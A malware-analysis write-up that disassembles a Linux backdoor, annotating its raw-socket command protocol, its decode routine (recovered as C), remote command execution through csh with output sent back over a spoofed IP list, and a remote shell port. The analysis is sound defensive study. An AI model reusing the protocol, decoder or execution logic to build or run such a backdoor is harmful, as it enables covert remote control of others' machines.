objdump -x the-binary

the-binary:     file format elf32-i386
the-binary
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x08048090

Program Header:
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x00024222 memsz 0x00024222 flags r-x
    LOAD off    0x00024228 vaddr 0x0806d228 paddr 0x0806d228 align 2**12
         filesz 0x0000c094 memsz 0x00011970 flags rw-

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .init         00000008  08048080  08048080  00000080  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  1 .text         0001f53c  08048090  08048090  00000090  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  2 __libc_subinit 00000004  080675cc  080675cc  0001f5cc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .fini         00000008  080675d0  080675d0  0001f5d0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  4 .rodata       00004c4a  080675d8  080675d8  0001f5d8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .data         0000c084  0806d228  0806d228  00024228  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  6 .ctors        00000008  080792ac  080792ac  000302ac  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  7 .dtors        00000008  080792b4  080792b4  000302b4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  8 .bss          000058dc  080792bc  080792bc  000302bc  2**2
                  ALLOC
  9 .note         00000d5c  00000000  00000000  000302bc  2**0
                  CONTENTS, READONLY
 10 .comment      00000ea6  00000000  00000000  00031018  2**0
                  CONTENTS, READONLY
objdump: the-binary: no symbols

Extract the strings from the file strings the-binary > strings
Extract the read only section .rodata
objdump -s -j .rodata the-binary > rodata
Disassemble the-binary
objdump -d the-binary > the-binary.dis

1-3,6-8 4,9 12 5

How to find function ?

strace

strace -i -f the-binary

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
[????????] execve("/home/kmaster/src/essai/reverse/the-binary", ["/home/kmaster/src/essai/reverse/the-binary"], [/* 23 vars */]) = 0
[080480b6] personality(0 /* PER_??? */) = 0
[08057216] geteuid()                    = 0
[080574f9] sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x40063868) = 0
[080571f2] fork()                       = 1472
[pid  1472] [08057346] setsid()         = 1472
[pid  1472] [080574f9] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
[pid  1472] [080571f2] fork()           = 1473
[pid  1473] [08057142] chdir("/")       = 0
[pid  1473] [0805716e] close(0)         = 0
[pid  1473] [0805716e] close(1)         = 0
[pid  1473] [0805716e] close(2)         = 0
[pid  1473] [08057452] time(NULL)       = 1021011869
[pid  1473] [08056d1e] socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0
[pid  1473] [080574f9] sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x40063868) = 0
[pid  1473] [080574f9] sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x40063868) = 0
[pid  1473] [080574f9] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
[pid  1473] [080574f9] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
[pid  1473] [08056b74] recv(0,  <unfinished ...>
[pid  1471] [08057562] _exit(0)         = ?
[pid  1472] [08057562] _exit(0)         = ?

Using this output, we know where are some functions. By exemple, recv function is at 8056b74.

syscalls

man syscalls

 8056b63:   ba 0a 00 00 00          mov    $0xa,%edx
 8056b68:   8d 4d f0                lea    0xfffffff0(%ebp),%ecx
 8056b6b:   b8 66 00 00 00          mov    $0x66,%eax
 8056b70:   89 d3                   mov    %edx,%ebx
 8056b72:   cd 80                   int    $0x80
The function number is eax register. Actually, eax register egals 0x66 or 102 in decimal. If you look in /usr/include/asm/unistd.h, you will see it's the socketcall function.
#define __NR_socketcall     102
In register ebx, you have the socketcall subfunction, its value is 0xa or 10. You can find in /usr/include/linux/net.h file, it's the sys_recv function.
#define SYS_RECV    10      /* sys_recv(2)          */
This function call is a call to recv().

Using the library

Extract from rodata, the read only part of the-binary.

 8068e78 24350000 40282329 20546865 204c696e  $5..@(#) The Lin
 8068e88 75782043 206c6962 72617279 20352e33  ux C library 5.3
 8068e98 2e313200 7c8e0608 474d5400 20202000  .12.|...GMT.   .

RedHat 4.1 is shipped with the libc 5.3.12 (it's not the only one). I got libc.a from libc-static-5.3.12-17.i386.rpm and use objdump to get a disassembly.

objdump -d libc.a > libc.dis

Extract of reverse/libc.dis

00000000 <recv>:
   0:   55                      push   %ebp
   1:   89 e5                   mov    %esp,%ebp
   3:   83 ec 10                sub    $0x10,%esp
   6:   56                      push   %esi
   7:   53                      push   %ebx
   8:   8b 55 0c                mov    0xc(%ebp),%edx
   b:   8b 4d 10                mov    0x10(%ebp),%ecx
   e:   8b 45 14                mov    0x14(%ebp),%eax
  11:   89 45 fc                mov    %eax,0xfffffffc(%ebp)
  14:   8b 5d 08                mov    0x8(%ebp),%ebx
  17:   89 5d f0                mov    %ebx,0xfffffff0(%ebp)
  1a:   89 55 f4                mov    %edx,0xfffffff4(%ebp)
  1d:   89 4d f8                mov    %ecx,0xfffffff8(%ebp)
  20:   ba 0a 00 00 00          mov    $0xa,%edx
  25:   8d 4d f0                lea    0xfffffff0(%ebp),%ecx
  28:   b8 66 00 00 00          mov    $0x66,%eax
  2d:   89 d3                   mov    %edx,%ebx
  2f:   cd 80                   int    $0x80

We can find a similar code in the disassembly of the-binary.

 8056b44:   55                      push   %ebp
 8056b45:   89 e5                   mov    %esp,%ebp
 8056b47:   83 ec 10                sub    $0x10,%esp
 8056b4a:   53                      push   %ebx
 8056b4b:   8b 55 0c                mov    0xc(%ebp),%edx
 8056b4e:   8b 4d 10                mov    0x10(%ebp),%ecx
 8056b51:   8b 45 14                mov    0x14(%ebp),%eax
 8056b54:   89 45 fc                mov    %eax,0xfffffffc(%ebp)
 8056b57:   8b 5d 08                mov    0x8(%ebp),%ebx
 8056b5a:   89 5d f0                mov    %ebx,0xfffffff0(%ebp)
 8056b5d:   89 55 f4                mov    %edx,0xfffffff4(%ebp)
 8056b60:   89 4d f8                mov    %ecx,0xfffffff8(%ebp)
 8056b63:   ba 0a 00 00 00          mov    $0xa,%edx
 8056b68:   8d 4d f0                lea    0xfffffff0(%ebp),%ecx
 8056b6b:   b8 66 00 00 00          mov    $0x66,%eax
 8056b70:   89 d3                   mov    %edx,%ebx
 8056b72:   cd 80                   int    $0x80

8056b44 is the start of the recv() function.

The raw socket

Socket creation

[pid  1473] [08056d1e] socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0

As read in the strace output, a raw socket is created. This socket handles IP packet with 0xB protocol. From /etc/protocols, it should be Network Voice Protocol (nvp).

Data reception

 80482b0:   6a 00                   push   $0x0
 80482b2:   68 00 08 00 00          push   $0x800
 80482b7:   8d 85 00 f8 ff ff       lea    0xfffff800(%ebp),%eax
 80482bd:   50                      push   %eax
 80482be:   8b 8d 38 bb ff ff       mov    0xffffbb38(%ebp),%ecx
 80482c4:   51                      push   %ecx
 80482c5:   e8 7a e8 00 00          call   0x8056b44    // recv

The man page (man 2 recv) gives the following prototype:

int recv(int s, void *buf, int len, unsigned int flags);

The socket is stored at 0xffffbb38(%ebp) (local variable, stack). The buffer is at 0xfffff800(%ebp) and is 2048 bytes length.

0xffffbb30(%ebp) is a pointer to this raw data buffer (ip header + data),
 804814d:   8d 95 00 f8 ff ff       lea    0xfffff800(%ebp),%edx
 8048153:   89 95 30 bb ff ff       mov    %edx,0xffffbb30(%ebp)
0xffffbb2c(%ebp) is a pointer to the data (0xfffff814=0xfffff800+20,ip header is 20 bytes)
 8048159:   8d 8d 14 f8 ff ff       lea    0xfffff814(%ebp),%ecx
 804815f:   89 8d 2c bb ff ff       mov    %ecx,0xffffbb2c(%ebp)
0xffffbb28(%ebp) is a pointer to &data[2] (0xfffff816=0xfffff814+2)
 8048165:   8d 95 16 f8 ff ff       lea    0xfffff816(%ebp),%edx
 804816b:   89 95 28 bb ff ff       mov    %edx,0xffffbb28(%ebp)
0xffffbb20(%ebp) is a pointer to a buffer for decoded data.
 8048297:       8d 8d 00 f0 ff ff       lea    0xfffff000(%ebp),%ecx
 804829d:       89 8d 20 bb ff ff       mov    %ecx,0xffffbb20(%ebp)

Using this knowledge, we can understand what is checked after the recv call.

The length of read data is stored in esi register.

 80482ca:   89 c6                   mov    %eax,%esi
 80482cc:   83 c4 10                add    $0x10,%esp

The IP protocol is checked (See RFC 791 for IP header), it must be nvp (0xB).

 80482cf:   8b 95 30 bb ff ff       mov    0xffffbb30(%ebp),%edx
 80482d5:   80 7a 09 0b             cmpb   $0xb,0x9(%edx)
 80482d9:   0f 85 d9 0b 00 00       jne    0x8048eb8
Check if data[0]==0x02
 80482df:   8b 8d 2c bb ff ff       mov    0xffffbb2c(%ebp),%ecx
 80482e5:   80 39 02                cmpb   $0x2,(%ecx)
 80482e8:   0f 85 ca 0b 00 00       jne    0x8048eb8
The packet size must be 201 bytes or more, so the data size must be 181 bytes or more (ip header=20).
 80482ee:   81 fe c8 00 00 00       cmp    $0xc8,%esi
 80482f4:   0f 8e be 0b 00 00       jle    0x8048eb8

The decoding algorithm

Call to decoding function

 80482fa:   8b 95 20 bb ff ff       mov    0xffffbb20(%ebp),%edx
 8048300:   52                      push   %edx
0xffffbb20(%ebp) is a pointer to a buffer for decoded data.
 8048301:   8b 8d 28 bb ff ff       mov    0xffffbb28(%ebp),%ecx
 8048307:   51                      push   %ecx

0xffffbb28(%ebp) is &data[2].

 8048308:   8d 46 ea                lea    0xffffffea(%esi),%eax
 804830b:   50                      push   %eax
 804830c:   e8 d7 1e 00 00          call   0x804a1e8

eax is egal to the number of bytes received - 22 (ip header size + 2=22, -22=0xffffffea). We have decode(nbr_bytes_received - 22, &data[2], decoded_data)

The decoding function

The code is obfuscated, unoptimized.

decrypt:
 804a1e8:   55                      push   %ebp
 804a1e9:   89 e5                   mov    %esp,%ebp
 804a1eb:   83 ec 04                sub    $0x4,%esp
 804a1ee:   57                      push   %edi
 804a1ef:   56                      push   %esi
 804a1f0:   53                      push   %ebx
 804a1f1:   8b 7d 08                mov    0x8(%ebp),%edi // edi=size
 804a1f4:   8d 5f ff                lea    0xffffffff(%edi),%ebx // size - 1
 804a1f7:   8d 47 03                lea    0x3(%edi),%eax // eax=size+2
 804a1fa:   24 fc                   and    $0xfc,%al
 804a1fc:   29 c4                   sub    %eax,%esp
 804a1fe:   89 65 fc                mov    %esp,0xfffffffc(%ebp) // other

 
 dest[0]=0;
 804a201:   8a 05 e5 75 06 08       mov    octet_0,%al
 804a207:   8b 75 10                mov    0x10(%ebp),%esi    // dest
 804a20a:   88 06                   mov    %al,(%esi)

 804a20c:   85 db                   test   %ebx,%ebx
 804a20e:   0f 8c 87 00 00 00       jl     decryptf
decryptb:
 if(ebx>0)
 804a214:   8d 53 ff                lea    0xffffffff(%ebx),%edx
 804a217:   85 db                   test   %ebx,%ebx
 804a219:   74 11                   je     0x804a22c
 804a21b:   8b 75 0c                mov    0xc(%ebp),%esi   // src
 804a21e:   0f b6 04 33             movzbl (%ebx,%esi,1),%eax
 804a222:   0f b6 14 32             movzbl (%edx,%esi,1),%edx
 804a226:   29 d0                   sub    %edx,%eax
 eax=source[ebx]-source[ebx-1];
 804a228:   eb 08                   jmp    0x804a232
 804a22a:   8d 36                   lea    (%esi),%esi
 else eax=source[0];
 804a22c:   8b 75 0c                mov    0xc(%ebp),%esi
 804a22f:   0f b6 06                movzbl (%esi),%eax

 ecx=eax-0x17;
 804a232:   8d 48 e9                lea    0xffffffe9(%eax),%ecx
 804a235:   85 c9                   test   %ecx,%ecx
 804a237:   7d 0b                   jge    0x804a244
 804a239:   8d 76 00                lea    0x0(%esi),%esi
 804a23c:   81 c1 00 01 00 00       add    $0x100,%ecx
 804a242:   78 f8                   js     0x804a23c

 for(edx=0;edx<size;edx++)


 804a244:   31 d2                   xor    %edx,%edx
 804a246:   39 fa                   cmp    %edi,%edx
 804a248:   7d 13                   jge    0x804a25d
 804a24a:   8d 36                   lea    (%esi),%esi

 other[edx]=dest[edx]
 804a24c:   8b 75 10                mov    0x10(%ebp),%esi // dest
 804a24f:   8a 04 32                mov    (%edx,%esi,1),%al
 804a252:   8b 75 fc                mov    0xfffffffc(%ebp),%esi // esp
 804a255:   88 04 32                mov    %al,(%edx,%esi,1)
 804a258:   42                      inc    %edx
 804a259:   39 fa                   cmp    %edi,%edx
 804a25b:   7c ef                   jl     0x804a24c

 804a25d:   8b 75 10                mov    0x10(%ebp),%esi  // dest
 804a260:   88 0e                   mov    %cl,(%esi)
 dest[0]=cl;
 804a262:   ba 01 00 00 00          mov    $0x1,%edx
 804a267:   39 fa                   cmp    %edi,%edx
 804a269:   7d 13                   jge    0x804a27e
 804a26b:   90                      nop    

 for(edx=1;edx<edi;edx++)
 804a26c:   8b 75 fc                mov    0xfffffffc(%ebp),%esi
 804a26f:   8a 44 32 ff             mov    0xffffffff(%edx,%esi,1),%al
 dest[edx]=other[edx-1];

 804a273:   8b 75 10                mov    0x10(%ebp),%esi  // dest
 804a276:   88 04 32                mov    %al,(%edx,%esi,1)
 804a279:   42                      inc    %edx
 804a27a:   39 fa                   cmp    %edi,%edx
 804a27c:   7c ee                   jl     0x804a26c

 Use snprintf to get other=ecx,dest
 804a27e:   8b 75 fc                mov    0xfffffffc(%ebp),%esi
 804a281:   56                      push   %esi
 804a282:   51                      push   %ecx
 804a283:   68 bf 78 06 08          push   $0x80678bf   %c%s
 804a288:   8b 75 10                mov    0x10(%ebp),%esi  // dest
 804a28b:   56                      push   %esi
 804a28c:   e8 77 55 00 00          call   sprint

 804a291:   83 c4 10                add    $0x10,%esp
 804a294:   4b                      dec    %ebx
 804a295:   0f 89 79 ff ff ff       jns    decryptb
decryptf:
 804a29b:   8d 65 f0                lea    0xfffffff0(%ebp),%esp
 804a29e:   5b                      pop    %ebx
 804a29f:   5e                      pop    %esi
 804a2a0:   5f                      pop    %edi
 804a2a1:   89 ec                   mov    %ebp,%esp
 804a2a3:   5d                      pop    %ebp
 804a2a4:   c3                      ret    
In fact, the algorithm is simple
void decode(const int len, const unsigned char *src, unsigned char *dst)
{
  int i;
  for(i=len-1;i>0;i--)
    dst[i]=src[i]-src[i-1]-0x17;
  dst[0]=src[0]-0x17;
}

The function table

At 0x804832c, we have a function table. There are 12 functions.

Function 1, Status query

 804835c:   8a 05 e5 75 06 08       mov    octet_0,%al
 8048362:   88 85 00 f8 ff ff       mov    %al,buffer_sock_raw(%ebp)
 8048368:   a1 7c e7 07 08          mov    0x807e77c,%eax
 804836d:   88 85 00 f8 ff ff       mov    %al,buffer_sock_raw(%ebp)
 data[1]=1
 8048373:   c6 85 01 f8 ff ff 01    movb   $0x1,0xfffff801(%ebp)
 data[2]=7
 804837a:   c6 85 02 f8 ff ff 07    movb   $0x7,0xfffff802(%ebp)
 is working ?
 8048381:   83 3d 74 e7 07 08 00    cmpl   $0x0,pid
 8048388:   74 16                   je     0x80483a0
 data[3]=1, working
 804838a:   c6 85 03 f8 ff ff 01    movb   $0x1,0xfffff803(%ebp)
 data[4]=fonction
 8048391:   a1 78 e7 07 08          mov    function_nbr,%eax
 8048396:   88 85 04 f8 ff ff       mov    %al,0xfffff804(%ebp)
 804839c:   eb 09                   jmp    0x80483a7
 804839e:   8d 36                   lea    (%esi),%esi

 data[3]=0, non working
 80483a0:   c6 85 03 f8 ff ff 00    movb   $0x0,0xfffff803(%ebp)

 add random garbage and sent the answer using IP list
 80483a7:   8b 95 20 bb ff ff       mov    decrypted_data_ptr(%ebp),%edx
 80483ad:   52                      push   %edx
 80483ae:   8d 85 00 f8 ff ff       lea    buffer_sock_raw(%ebp),%eax
 80483b4:   50                      push   %eax
 80483b5:   68 90 01 00 00          push   $0x190       // 400
 80483ba:   e8 d5 1d 00 00          call   encrypt
 80483bf:   e8 94 dc 00 00          call   call_random
 80483c4:   b9 c9 00 00 00          mov    $0xc9,%ecx   // 201
 80483c9:   99                      cltd   
 80483ca:   f7 f9                   idiv   %ecx,%eax    
 80483cc:   89 d3                   mov    %edx,%ebx
 80483ce:   8d 83 90 01 00 00       lea    0x190(%ebx),%eax // add 0-200
 80483d4:   50                      push   %eax
 80483d5:   8b 95 20 bb ff ff       mov    decrypted_data_ptr(%ebp),%edx
 80483db:   52                      push   %edx
 80483dc:   8b 8d 1c bb ff ff       mov    0xffffbb1c(%ebp),%ecx // IP list
 80483e2:   51                      push   %ecx
 80483e3:   e8 e4 0a 00 00          call   go_send_raw

See function 2 for go_send_raw function

Function 2, Set IP client address for network response, included or not fake IP

function_2:
 Backup parameters: "stealth" mode and IP
 80483f0:   0f b6 95 02 f0 ff ff    movzbl 0xfffff002(%ebp),%edx
 80483f7:   89 15 84 e7 07 08       mov    %edx,0x807e784

 80483fd:   8a 85 10 f8 ff ff       mov    0xfffff810(%ebp),%al
 8048403:   88 05 80 e7 07 08       mov    %al,0x807e780
 8048409:   8a 85 11 f8 ff ff       mov    0xfffff811(%ebp),%al
 804840f:   88 05 81 e7 07 08       mov    %al,0x807e781
 8048415:   8a 85 12 f8 ff ff       mov    0xfffff812(%ebp),%al
 804841b:   88 05 82 e7 07 08       mov    %al,0x807e782
 8048421:   8a 85 13 f8 ff ff       mov    0xfffff813(%ebp),%al
 8048427:   88 05 83 e7 07 08       mov    %al,0x807e783
 Get random position in edi
 804842d:   6a 00                   push   $0x0
 804842f:   e8 10 f0 00 00          call   time
 8048434:   83 c4 04                add    $0x4,%esp
 8048437:   50                      push   %eax
 8048438:   e8 63 d5 00 00          call   srandom
 804843d:   83 c4 04                add    $0x4,%esp
 8048440:   e8 13 dc 00 00          call   call_random
 8048445:   b9 0a 00 00 00          mov    $0xa,%ecx
 804844a:   99                      cltd   
 804844b:   f7 f9                   idiv   %ecx,%eax
 804844d:   89 d7                   mov    %edx,%edi
 for(ebx=0;ebx<10;ebx++)
 804844f:   31 db                   xor    %ebx,%ebx
 8048451:   31 f6                   xor    %esi,%esi
 8048453:   90                      nop    
function_2_loop:
 edi position is reserved
 8048454:   39 fb                   cmp    %edi,%ebx
 8048456:   0f 84 cf 00 00 00       je     0x804852b

 804845c:   83 3d 84 e7 07 08 02    cmpl   $0x2,0x807e784
 8048463:   75 33                   jne    0x8048498
 data[2]==2, insert IP in IP list
 8048465:   8a 84 9d 03 f0 ff ff    mov    0xfffff003(%ebp,%ebx,4),%al
 804846c:   8b 95 1c bb ff ff       mov    0xffffbb1c(%ebp),%edx
 8048472:   88 04 32                mov    %al,(%edx,%esi,1)

 8048475:   8a 84 9d 04 f0 ff ff    mov    0xfffff004(%ebp,%ebx,4),%al
 804847c:   88 44 16 01             mov    %al,0x1(%esi,%edx,1)

 8048480:   8a 84 9d 05 f0 ff ff    mov    0xfffff005(%ebp,%ebx,4),%al
 8048487:   88 44 16 02             mov    %al,0x2(%esi,%edx,1)

 804848b:   8a 84 9d 06 f0 ff ff    mov    0xfffff006(%ebp,%ebx,4),%al
 8048492:   e9 90 00 00 00          jmp    0x8048527

 8048497:   90                      nop    
 Get a random IP
 8048498:   e8 bb db 00 00          call   call_random
 804849d:   89 85 10 bb ff ff       mov    %eax,0xffffbb10(%ebp)
 80484a3:   85 c0                   test   %eax,%eax
 80484a5:   7d 0c                   jge    0x80484b3
 80484a7:   8d 88 ff 00 00 00       lea    0xff(%eax),%ecx
 80484ad:   89 8d 10 bb ff ff       mov    %ecx,0xffffbb10(%ebp)
 80484b3:   8b 95 1c bb ff ff       mov    0xffffbb1c(%ebp),%edx
 80484b9:   88 04 16                mov    %al,(%esi,%edx,1)

 80484bc:   e8 97 db 00 00          call   call_random
 80484c1:   89 85 10 bb ff ff       mov    %eax,0xffffbb10(%ebp)
 80484c7:   85 c0                   test   %eax,%eax
 80484c9:   7d 0c                   jge    0x80484d7
 80484cb:   8d 88 ff 00 00 00       lea    0xff(%eax),%ecx
 80484d1:   89 8d 10 bb ff ff       mov    %ecx,0xffffbb10(%ebp)
 80484d7:   8b 95 1c bb ff ff       mov    0xffffbb1c(%ebp),%edx
 80484dd:   88 44 16 01             mov    %al,0x1(%esi,%edx,1)

 80484e1:   e8 72 db 00 00          call   call_random
 80484e6:   89 85 10 bb ff ff       mov    %eax,0xffffbb10(%ebp)
 80484ec:   85 c0                   test   %eax,%eax
 80484ee:   7d 0c                   jge    0x80484fc
 80484f0:   8d 88 ff 00 00 00       lea    0xff(%eax),%ecx
 80484f6:   89 8d 10 bb ff ff       mov    %ecx,0xffffbb10(%ebp)
 80484fc:   8b 95 1c bb ff ff       mov    0xffffbb1c(%ebp),%edx
 8048502:   88 44 16 02             mov    %al,0x2(%esi,%edx,1)

 8048506:   e8 4d db 00 00          call   call_random
 804850b:   89 85 10 bb ff ff       mov    %eax,0xffffbb10(%ebp)
 8048511:   85 c0                   test   %eax,%eax
 8048513:   7d 0c                   jge    0x8048521
 8048515:   8d 88 ff 00 00 00       lea    0xff(%eax),%ecx
 804851b:   89 8d 10 bb ff ff       mov    %ecx,0xffffbb10(%ebp)
 8048521:   8b 95 1c bb ff ff       mov    0xffffbb1c(%ebp),%edx
 end of for
 8048527:   88 44 16 03             mov    %al,0x3(%esi,%edx,1)
 804852b:   83 c6 04                add    $0x4,%esi
 804852e:   43                      inc    %ebx
 804852f:   83 fb 09                cmp    $0x9,%ebx
 8048532:   0f 8e 1c ff ff ff       jle    0x8048454
 if data[2]==0, the IP will be at the begining of the list and will be the only one.
 8048538:   a1 84 e7 07 08          mov    0x807e784,%eax
 804853d:   85 c0                   test   %eax,%eax
 804853f:   75 02                   jne    0x8048543
 8048541:   31 ff                   xor    %edi,%edi
 if data[2]!=2, the IP will be at the the random edi position.
 8048543:   83 f8 02                cmp    $0x2,%eax
 8048546:   0f 84 6c 09 00 00       je     go_boucle
 804854c:   c1 e7 02                shl    $0x2,%edi
 804854f:   89 bd 14 bb ff ff       mov    %edi,0xffffbb14(%ebp)
 8048555:   8a 85 03 f0 ff ff       mov    0xfffff003(%ebp),%al
 804855b:   8b 8d 1c bb ff ff       mov    0xffffbb1c(%ebp),%ecx
 8048561:   88 04 0f                mov    %al,(%edi,%ecx,1)
 8048564:   8a 85 04 f0 ff ff       mov    0xfffff004(%ebp),%al
 804856a:   8b 95 14 bb ff ff       mov    0xffffbb14(%ebp),%edx
 8048570:   88 44 0a 01             mov    %al,0x1(%edx,%ecx,1)
 8048574:   8a 85 05 f0 ff ff       mov    0xfffff005(%ebp),%al
 804857a:   88 44 0a 02             mov    %al,0x2(%edx,%ecx,1)
 804857e:   8a 85 06 f0 ff ff       mov    0xfffff006(%ebp),%al
 8048584:   88 44 0a 03             mov    %al,0x3(%edx,%ecx,1)
 8048588:   e9 2b 09 00 00          jmp    go_boucle

The function go_send_raw is used to send answer

go_send_raw:
 8048ecc:   55                      push   %ebp
 8048ecd:   89 e5                   mov    %esp,%ebp
 8048ecf:   57                      push   %edi
 8048ed0:   56                      push   %esi
 8048ed1:   53                      push   %ebx
 8048ed2:   8b 45 08                mov    0x8(%ebp),%eax
 8048ed5:   8b 7d 10                mov    0x10(%ebp),%edi
 Check if "stealth" mode is present
 8048ed8:   83 3d 84 e7 07 08 00    cmpl   $0x0,0x807e784
 8048edf:   74 2f                   je     0x8048f10
 Sent packet to the IP list
 8048ee1:   89 c3                   mov    %eax,%ebx
 8048ee3:   8d 73 24                lea    0x24(%ebx),%esi
 8048ee6:   8d 36                   lea    (%esi),%esi
 8048ee8:   68 a0 0f 00 00          push   $0xfa0
 8048eed:   e8 be c6 00 00          call   feof
 8048ef2:   57                      push   %edi
 8048ef3:   8b 55 0c                mov    0xc(%ebp),%edx
 8048ef6:   52                      push   %edx
 8048ef7:   53                      push   %ebx
 8048ef8:   68 80 e7 07 08          push   $0x807e780
 8048efd:   e8 92 00 00 00          call   send_raw
 8048f02:   83 c4 14                add    $0x14,%esp
 8048f05:   83 c3 04                add    $0x4,%ebx
 8048f08:   39 f3                   cmp    %esi,%ebx
 8048f0a:   7e dc                   jle    0x8048ee8
 8048f0c:   eb 12                   jmp    0x8048f20
 8048f0e:   8d 36                   lea    (%esi),%esi
 Send packet to one IP only
 
 8048f10:   57                      push   %edi
 8048f11:   8b 55 0c                mov    0xc(%ebp),%edx
 8048f14:   52                      push   %edx
 8048f15:   50                      push   %eax
 8048f16:   68 80 e7 07 08          push   $0x807e780
 8048f1b:   e8 74 00 00 00          call   send_raw
 return 1
 8048f20:   b8 01 00 00 00          mov    $0x1,%eax
 8048f25:   8d 65 f4                lea    0xfffffff4(%ebp),%esp
 8048f28:   5b                      pop    %ebx
 8048f29:   5e                      pop    %esi
 8048f2a:   5f                      pop    %edi
 8048f2b:   89 ec                   mov    %ebp,%esp
 8048f2d:   5d                      pop    %ebp
 8048f2e:   c3                      ret    

Function 3, remote execution

 80485f3:   68 e6 75 06 08          push   $file_tmp
 80485f8:   8b 8d 20 bb ff ff       mov    decrypted_data_ptr(%ebp),%ecx
 80485fe:   51                      push   %ecx
 80485ff:   68 f5 75 06 08          push   m_csh
 8048604:   8d 9d 00 f8 ff ff       lea    buffer_sock_raw(%ebp),%ebx
 804860a:   53                      push   %ebx
 804860b:   e8 f8 71 00 00          call   sprintf

The program manipulates the user command to redirect the command output to the file /tmp/.hj237349. It's equivalent to

sprintf("/bin/csh -f -c "%s" 1gt; %s 2>&1",decrypted_data, "/tmp/.hj237349")
 8048610:   53                      push   %ebx
 8048611:   e8 d2 d1 00 00          call   system
 file /tmp/.hj237349 is opened in read only
 8048616:   68 14 76 06 08          push   $0x8067614 // "rb"
 804861b:   68 e6 75 06 08          push   $file_tmp
 8048620:   e8 fb 6f 00 00          call   fopen
 8048625:   89 85 24 bb ff ff       mov    %eax,0xffffbb24(%ebp) // handle
 804862b:   83 c4 1c                add    $0x1c,%esp
 804862e:   85 c0                   test   %eax,%eax
 8048630:   0f 84 dc 00 00 00       je     0x8048712
 8048636:   31 ff                   xor    %edi,%edi        // edi=0, first packet
 8048638:   8d 95 70 ee ff ff       lea    0xffffee70(%ebp),%edx
 804863e:   89 95 18 bb ff ff       mov    %edx,0xffffbb18(%ebp)
398 bytes are read

 8048644:   8b 8d 24 bb ff ff       mov    0xffffbb24(%ebp),%ecx    // handle
 804864a:   51                      push   %ecx
 804864b:   68 8e 01 00 00          push   $0x18e           // 398
 8048650:   6a 01                   push   $0x1
 8048652:   8d 85 00 f8 ff ff       lea    buffer_sock_raw(%ebp),%eax
 8048658:   50                      push   %eax
 8048659:   e8 76 70 00 00          call   _IO_fread
 804865e:   89 c6                   mov    %eax,%esi
 8048660:   c6 84 2e 00 f8 ff ff    movb   $0x0,buffer_sock_raw(%esi,%ebp,1)
 8048667:   00 
 copy data
 8048668:   31 db                   xor    %ebx,%ebx
 804866a:   83 c4 10                add    $0x10,%esp
 804866d:   8d 76 00                lea    0x0(%esi),%esi
 8048670:   8a 84 2b 00 f8 ff ff    mov    buffer_sock_raw(%ebx,%ebp,1),%al
 8048677:   88 84 2b 02 f0 ff ff    mov    %al,0xfffff002(%ebx,%ebp,1)  
 804867e:   43                      inc    %ebx
 804867f:   81 fb 8d 01 00 00       cmp    $0x18d,%ebx
 8048685:   7e e9                   jle    0x8048670
 First packet will have data[1]=3, others 4.
 8048687:   85 ff                   test   %edi,%edi
 8048689:   75 11                   jne    0x804869c
 804868b:   c6 85 01 f0 ff ff 03    movb   $0x3,0xfffff001(%ebp)    // first packet, type=3
 8048692:   bf 01 00 00 00          mov    $0x1,%edi
 8048697:   eb 0a                   jmp    0x80486a3
 8048699:   8d 76 00                lea    0x0(%esi),%esi
 804869c:   c6 85 01 f0 ff ff 04    movb   $0x4,0xfffff001(%ebp)    // next packet, type=4
 Encrypt data
 80486a3:   8b 95 18 bb ff ff       mov    0xffffbb18(%ebp),%edx    // buffer data
 80486a9:   52                      push   %edx
 80486aa:   8b 8d 20 bb ff ff       mov    decrypted_data_ptr(%ebp),%ecx
 80486b0:   51                      push   %ecx
 80486b1:   68 90 01 00 00          push   $0x190
 80486b6:   e8 d9 1a 00 00          call   encrypt
 Between 0 and 200 bytes of random data are added
 80486bb:   e8 98 d9 00 00          call   call_random
 80486c0:   b9 c9 00 00 00          mov    $0xc9,%ecx
 80486c5:   99                      cltd   
 80486c6:   f7 f9                   idiv   %ecx,%eax
 80486c8:   89 d3                   mov    %edx,%ebx
 80486ca:   8d 83 90 01 00 00       lea    0x190(%ebx),%eax // add random data, 0-200
 and send. See function 2 for go_send_raw function
 80486d0:   50                      push   %eax
 80486d1:   8b 95 18 bb ff ff       mov    0xffffbb18(%ebp),%edx    // buffer data
 80486d7:   52                      push   %edx
 80486d8:   8b 8d 1c bb ff ff       mov    0xffffbb1c(%ebp),%ecx
 80486de:   51                      push   %ecx
 80486df:   e8 e8 07 00 00          call   go_send_raw
 if it's not the end of the file, it loops
 80486e4:   68 80 1a 06 00          push   $0x61a80
 80486e9:   e8 c2 ce 00 00          call   feof
 80486ee:   83 c4 1c                add    $0x1c,%esp
 80486f1:   85 f6                   test   %esi,%esi
 80486f3:   0f 85 4b ff ff ff       jne    0x8048644
 close the handle, delete the file and the childs exit
 80486f9:   8b 95 24 bb ff ff       mov    0xffffbb24(%ebp),%edx    // handle
 80486ff:   52                      push   %edx
 8048700:   e8 3b 6e 00 00          call   fclose
 8048705:   68 e6 75 06 08          push   $file_tmp
 804870a:   e8 ad ec 00 00          call   unlink
 804870f:   83 c4 08                add    $0x8,%esp
 8048712:   6a 00                   push   $0x0
 8048714:   e8 3b ee 00 00          call   exit

Function 6, remote shell

 port 0x5AF1=23281
